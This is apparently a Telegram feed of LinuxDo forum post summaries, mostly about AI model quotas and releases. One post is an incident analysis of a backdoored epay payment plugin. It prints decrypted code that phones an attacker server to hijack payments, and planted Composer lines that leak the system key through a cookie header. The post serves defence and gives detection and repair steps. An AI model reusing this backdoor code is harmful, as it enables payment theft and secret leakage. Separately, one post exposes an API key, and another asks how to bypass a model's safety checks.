LinuxDo 新帖推送
165 subscribers
245K photos
305K links
Download Telegram
标题: 今天的kiki太拉了
作者: #xihalele
板块: #国产替代
编号: 2046781
帖子: https://linux.do/t/topic/2046781
时间: 2026-04-24 16:43:55
摘要:
巨慢 1个小时整不了一个write
标题: 【公益预告】发件API服务-CuzEmailService
作者: #Lonely
板块: #搞七捻三
编号: 2046786
帖子: https://linux.do/t/topic/2046786
时间: 2026-04-24 16:44:24
摘要:
这几天开通了CF business,然后有Email Sending权限了
如图

那么下一个就做发件公益吧~
名字暂定Cuz EmailService
期待不.ini
期待不.ini

期待.webp
不期待.jpeg
我也不知道.gif

Click to view the poll.
本文纯水和聊天,没有任何推广成分。
标题: hermes 项目ai味很重
作者: #lanczos
板块: #搞七捻三
编号: 2046795
帖子: https://linux.do/t/topic/2046795
时间: 2026-04-24 16:45:03
摘要:
问了ai, 说是这个项目主要是ai写的
标题: 佬们,为什么我要求达到了二级条件却没有升级?
作者: #Wohou
板块: #搞七捻三
编号: 2046812
帖子: https://linux.do/t/topic/2046812
时间: 2026-04-24 16:47:09
摘要:
标题: codex 额度不够用啊, pro 一天花了 40%的周额度
作者: #曹儒士子
板块: #搞七捻三
编号: 2046813
帖子: https://linux.do/t/topic/2046813
时间: 2026-04-24 16:47:10
摘要:
兄弟们,太难了… 还是得 codex 和 Claude code一起用。
之前从来没考虑过token消耗,昨天是开了它的 fast 模式,但是感觉这也太快了。今天只能抠抠搜搜,这感觉,差劲极了。。
标题: 方舟的coding plan有glm5.1了?
作者: #XDDDDD
板块: #开发调优
编号: 2046815
帖子: https://linux.do/t/topic/2046815
时间: 2026-04-24 16:47:29
摘要:
还是我火星了,怎么也要抢,有没有用过的老哥说说,流畅么
标题: 求教万能佬友:怎么拦截一个 url 返回我自定义的 JSON 数据
作者: #ITSource 每日分享
板块: #开发调优
编号: 2046826
帖子: https://linux.do/t/topic/2046826
时间: 2026-04-24 16:48:24
摘要:
背景:
有一个 url: https://www.example.com/test
接口返回了一个 JSON;{“hello”:“hello”}
这个域名和服务都不是我的,我想拦截本机请求这个地址的请求,返回一个我自己的 json,请问可以实现吗,有哪些现有方案可以提供
标题: 在claw cloud run跑路之前,重新部署了cpa和metapi,体验好了很多
作者: #Infinity4B
板块: #开发调优
编号: 2046829
帖子: https://linux.do/t/topic/2046829
时间: 2026-04-24 16:48:47
摘要:
看到消息说claw cloud run跑路了,之前把cpa部署在上面,metapi部署在我自己的vps上,用起来总感觉卡卡的。正好看到站里有讨论用Zeabur了,索性把服务都迁到Zeabur上,感觉神清气爽了,调自己的cpa首字1s内,调其他公益站也快很多。
标题: 好垃圾的火山方舟coding plan
作者: #huangsheng
板块: #国产替代
编号: 2046830
帖子: https://linux.do/t/topic/2046830
时间: 2026-04-24 16:48:57
摘要:
原以为这个不用抢开心坏了,结果一个很小的任务都没做完就达到五小时上限了,连续两次了。这还搞个啥。买的lite
标题: 能维持一分钟吗?
作者: #Y0816
板块: #福利羊毛
编号: 2046831
帖子: https://linux.do/t/topic/2046831
时间: 2026-04-24 16:49:00
摘要:
uil:http://101.43.9.6:3000/
sk-X8cHXLlJM3UVvQsdtFtF9TgeyRmrvAFLkYhLKyYdy38IcLYt
还有25刀
标题: 也是在dy刷到L站了
作者: #xiaoyan
板块: #搞七捻三
编号: 2046832
帖子: https://linux.do/t/topic/2046832
时间: 2026-04-24 16:49:02
摘要:
标题: gpt5.5道德标兵,咋绕过啊
作者: #looch
板块: #开发调优
编号: 2046857
帖子: https://linux.do/t/topic/2046857
时间: 2026-04-24 16:52:12
摘要:
随便问两个问题就触发安全机制
标题: ollama cloud上架deepseek v4 flash
作者: #mi tu
板块: #前沿快讯
编号: 2046870
帖子: https://linux.do/t/topic/2046870
时间: 2026-04-24 16:53:14
摘要:
模型卡片:deepseek-v4-flash
标题: 氵一下 UU调查问卷: “你从哪里了解AI?” “Linux.do!”
作者: #奶油话梅糖
板块: #搞七捻三
编号: 2046875
帖子: https://linux.do/t/topic/2046875
时间: 2026-04-24 16:53:41
摘要:
“你从哪里了解AI?” “Linux.do!”
标题: Claude周限额重置时间提前了,一个周末要猛蹬了!
作者: #ironfish
板块: #开发调优
编号: 2046877
帖子: https://linux.do/t/topic/2046877
时间: 2026-04-24 16:54:06
摘要:
上次是定到周五0700,刚突然发现周日0100又要重置,这三天咋用得完一周的量! 通宵蹬车!
标题: DeepSeek-V4-Pro Benchmark简单解读
作者: #IfElse
板块: #前沿快讯
编号: 2046883
帖子: https://linux.do/t/topic/2046883
时间: 2026-04-24 16:54:54
摘要:
(话题已被作者删除)
标题: 今天都在讨论DS-V4,没人说一下gpt-5.5吗?
作者: #lwl2333
板块: #开发调优
编号: 2046912
帖子: https://linux.do/t/topic/2046912
时间: 2026-04-24 16:56:48
摘要:
今天看到GPT-5.5发布火速更新CPA(CPA作者更新速度真的快),然后在自己本地用上了5.5
,到今天下来,总体体验极佳,响应速度极快,回答质量有明显提升。最显著的感受就是能看懂5.5说啥了,有一种几个月前opus4.6的感觉(好久没有蹬4.6了。。)。现在5.5就是不说废话,输出更简洁,指哪打哪。现在是两个plus号在用,感觉有点不够,消耗太快了。
标题: 易支付系统与支付插件劫持后门与系统密钥泄露漏洞
作者: #Imx
板块: #开发调优
编号: 2046917
帖子: https://linux.do/t/topic/2046917
时间: 2026-04-24 16:57:28
摘要:
本次事件涉及针对 易支付宝二开收款平台的供应链攻击,攻击者通过向受害者出售植入后门的支付插件,并同步篡改系统底层文件,实现了对支付渠道的劫持以及系统主密钥的窃取。
​ 这里还是要说明一点,易支付系统一定要买正版,不要用不明来源的网站源码 不然被植入后门就不好了,还有支付插件如果有加密不能看代码的话 尽量不用 因为一般都是有猫腻的 比如说这次的就是
已确认的两类安全威胁:




威胁类型
受影响组件
危害




支付截单劫持
plugins/jfyui/jfyui_plugin.php
每笔支付可被路由至攻击者账户,资金直接损失


系统密钥泄露
includes/vendor/composer/ 两个文件
攻击者可获取 syskey,实现无密码登录管理后台、伪造任意 API 签名




一、支付截单劫持漏洞
1.1 漏洞原理
恶意插件在每次支付请求生成二维码之前,会向攻击者控制的服务器发起出站请求,获取劫持指令。若攻击者下发替换指令,插件将在 PHP 运行时内存中将收款商户信息(商户 ID、商户号、店铺名)替换为攻击者账户信息,完成拉卡拉下单。
整个替换过程仅存在于单次请求的内存中,请求结束后立即销毁,数据库中的商户配置始终保持原值,导致受害者通过后台巡查无法发现任何异常。
攻击流程如下:
客户端发起支付请求

├─► 恶意插件向 www.xitong.uno/zhangzitong.php 上报受害商户信息

├─► 攻击者服务器返回劫持指令(含攻击者商户 ID、商户号、店铺名)

├─► 内存中替换收款商户信息(数据库配置不受影响)

└─► 以攻击者账户信息向拉卡拉 API 下单 → 资金进入攻击者账户

1.2 攻击者基础设施




项目





劫持控制服务器
https://www.xitong.uno/zhangzitong.php


加密混淆平台
jiami.ka234.cn / jiami.xitong.uno


服务器 IP
45.207.199.14(香港,cognetcloud INC)


攻击者拉卡拉结算账户
822581052111E8T



1.3 恶意代码(解密还原)
以下为从加密插件中还原的关键逻辑,完整体现了劫持机制:
// 攻击者控制服务器(硬编码)
private static $ROUTE_URL = 'https://www.xitong.uno/zhangzitong.php';

// 步骤一:每次下单前将受害者商户信息上报至控制服务器
self::reportMerch($channel['appurl'], $channel['appkey'], $shopName);

// 步骤二:向控制服务器请求劫持指令
// 服务器返回格式:{"merchId":"攻击者ID","merchantNo":"攻击者商户号","shopName":"攻击者店铺名"}
$routeMerch = self::getRouteMerch($amount, $payType, $channel['appurl'], TRADE_NO);

// 步骤三:在内存中执行商户替换(仅影响本次请求,不写入数据库)
if ($routeMerch !== null && !empty($routeMerch['merchId'])) {
$merchId = $routeMerch['merchId'];
$merchantNo = $routeMerch['merchantNo'];
$shopName = $routeMerch['shopName'];
}

// 步骤四:以攻击者商户信息向拉卡拉提交订单
$orderResponse = curlRequest('https://jfyconsole.lakala.com/order/api/cashier/pay', ...);

// 步骤五:支付完成后向控制服务器上报截单统计
self::reportPayStatus($tradeNo);

1.4 检测方法
方法一:文件特征检查
正常的 jfyui 插件约 8 KB,恶意版本因附带加密后门代码通常超过 25 KB。
ls -lh /网站根目录/plugins/jfyui/jfyui_plugin.php

文件开头如出现以下格式,说明已被恶意加密:
return sg_load('DB54D5B7FDF1B257AA...');

正常版本开头为标准可读 PHP 代码(<?php)。
方法二:拉卡拉 API 对账
通过拉卡拉查单接口,以本平台订单号查询实际收款商户的 merchantNo 字段。若返回的商户号与本平台商户号不符,该笔交易资金已被截走。
方法三:订单号格式分析
被劫持订单的 api_trade_no 字段为 29 位纯数字,前 6 位格式为 26YYMMDD(缴费易平台订单号特征)。同时,劫持期间的订单支付完成率会显著低于正常水平(正常约 87%,劫持后因用户识别到陌生商户名拒绝付款,完成率可能不足 10%)。
1.5 损失评估(本次事件)
通过拉卡拉 API 对劫持期间(2026-04-20 至 2026-04-22)全部订单逐笔核查:




日期
路由至攻击者的订单数
实际完成支付(损失)




2026-04-20
151 笔
0 笔,¥0


2026-04-21
198 笔
0 笔,¥0


2026-04-22
83 笔
1 笔,¥50.00


合计
432 笔
1 笔,¥50.00



绝大多数终端用户因识别到收款方为陌生商户名而主动终止付款,在客观上限制了资金损失规模。
1.6 修复步骤
步骤一:替换 jfyui 插件文件
优先使用已知干净的备份文件覆盖。若无外部备份,epay 系统插件目录下通常存在原始备份:
/网站根目录/plugins/jfyui/新建文件夹/jfyui_plugin.php

确认该文件为明文可读的 PHP 代码后,将其覆盖至上一级目录的 jfyui_plugin.php。
步骤二:检查 crons.php
同目录下的 crons.php 正常大小约 1.7 KB(功能为定时轮询未支付订单)。若文件明显偏大,应同步替换。
步骤三:清除攻击者植入的 jiaofeiyi 目录
检查插件目录是否存在攻击者在主攻击后约 5.5 小时补充植入的持久化目录:
ls /网站根目录/plugins/jiaofeiyi/

若存在,直接删除整个目录。
步骤四:向拉卡拉举报
向拉卡拉举报商户号 822581052111E8T,申请冻结该账户并协助司法调查。

二、系统密钥(syskey)泄露漏洞
2.1 漏洞概述
攻击者在 epay 系统的 Composer 自动加载器文件中植入了两段隐蔽代码,利用 HTTP 请求头触发,将系统主密钥(syskey)写入 HTTP 响应的 Set-Cookie 头返回给攻击者。
受影响文件:
/网站根目录/includes/vendor/composer/platform_check.php
/网站根目录/includes/vendor/composer/autoload_real.php

时间戳伪造:攻击者将上述两个文件的 mtime 修改为 2023-10-20,使其外观与系统原生 Composer 文件一致,以规避常规的文件修改时间巡查。文件修改时间戳不可作为文件完整性的判断依据。
2.2 植入代码分析
platform_check.php 中植入的两行(正常文件不含此内容):
define('SERVER_PHP_VERSION', $GLOBALS['_SERVER']['HTTP_PHP_VERSION']);
define('SENTENCEIA', "Sorry for the con figuration sys tem key issue.");

第二行看似普通的错误提示字符串,实为精心构造的编码载体。按空格分词后:
索引 3: "con" → 作为数组键名的第一部分
索引 4: "figuration" → 取首字母 "f",拼合为 "conf"
索引 5: "sys" → 作为数组键名的第一部分
索引 7: "key" → 拼合为 "syskey"

最终解析目标为:$GLOBALS['conf']['syskey'],即 epay 系统主密钥。
autoload_real.php 中植入的三行(位于第 26–28 行,夹于正常 Composer 代码之间):
if (SERVER_PHP_VERSION >= 70200) {
$wordsArray = explode(" ", SENTENCEIA);
header("Set-Cookie: PHPSESSID=" . $GLOBALS[$wordsArray[3] . substr($wordsArray[4], 0, 1)][$wordsArray[5] . $wordsArray[7]]);
}

触发条件:HTTP 请求携带自定义请求头 PHP
标题: 如果有一个在美国的朋友,能干点什么搞钱呢(合法)
作者: #提肛小助手
板块: #搞七捻三
编号: 2046940
帖子: https://linux.do/t/topic/2046940
时间: 2026-04-24 16:59:06
摘要:
如果有一个在美国的朋友,能干点什么搞钱呢(合法)?
标题: deepseek-v4-pro error: 400,有人遇到这情况吗?
作者: #Wangyj
板块: #搞七捻三
编号: 2046944
帖子: https://linux.do/t/topic/2046944
时间: 2026-04-24 16:59:14
摘要:
如图,本来用的好好的,突然不行了。实测,v4-flash 还能用